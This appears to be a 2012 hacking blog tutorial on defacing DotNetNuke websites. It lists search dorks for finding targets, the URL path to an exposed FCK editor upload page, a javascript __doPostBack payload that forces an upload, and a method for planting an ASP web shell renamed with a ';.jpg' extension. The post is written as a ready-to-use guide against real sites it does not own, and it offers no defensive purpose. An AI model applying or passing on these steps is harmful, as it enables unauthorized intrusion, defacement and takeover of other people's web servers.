Hack websites with simple ways like dnn | pictured [TUT] ~ TeCh ZoNe

Trending: TeCh ZoNe

Wednesday, April 25, 2012

Hack websites with simple ways like dnn | pictured [TUT]

Do you like this story?

info: dnn {Dot net nuke}

10% websites are vulnerable of this attack and very short method
use firefox for this Tutorial

step 1: find vulnerable website using any of the following

dorks:

inurl: "fck/fcklinkgallery.aspx"

inurl:/tabid/36/language/en-US/Default.aspx

inurl:"Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx"

{for specific attack}

step 2: if you are in the home page Do this -:

home page =>
http://www.website.com/Home/tabid/36/language/en-US/Default.aspx

replacing =>
/Home/tabid/36/language/en-US/Default.aspx

with

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

step 3: following page will appear -:

now select the third option
you will recieve some thing like that -:

step 4: now run this script in address bar -:

javascript:__doPostBack('ctlURL$cmdUpload','')

step 5: now if the attack works you will able to upload deface and the website will be injected
{note u cant upload deface in .html format so try image defacing}

to view hack website use -:
http://www.hackedwebsite/Portals/0/yourdeface.txt

live example: click here

uploading (.html) file!!: you can upload a shell in image format to pwned website then u can upload (.html) format deface easily :P :P!!!

step 1: first download ASP shell here now change its format to image just rename it and type shell.jgp sh3ll will convert into image format..

step 2: upload the .jpg format shell into the website.

step 3: After upload go for your shell www.yoursite.com/portals/0/yourshellname.asp;.jpg

step 4: now you will recieve something like that if you are not recieving then reload the page!!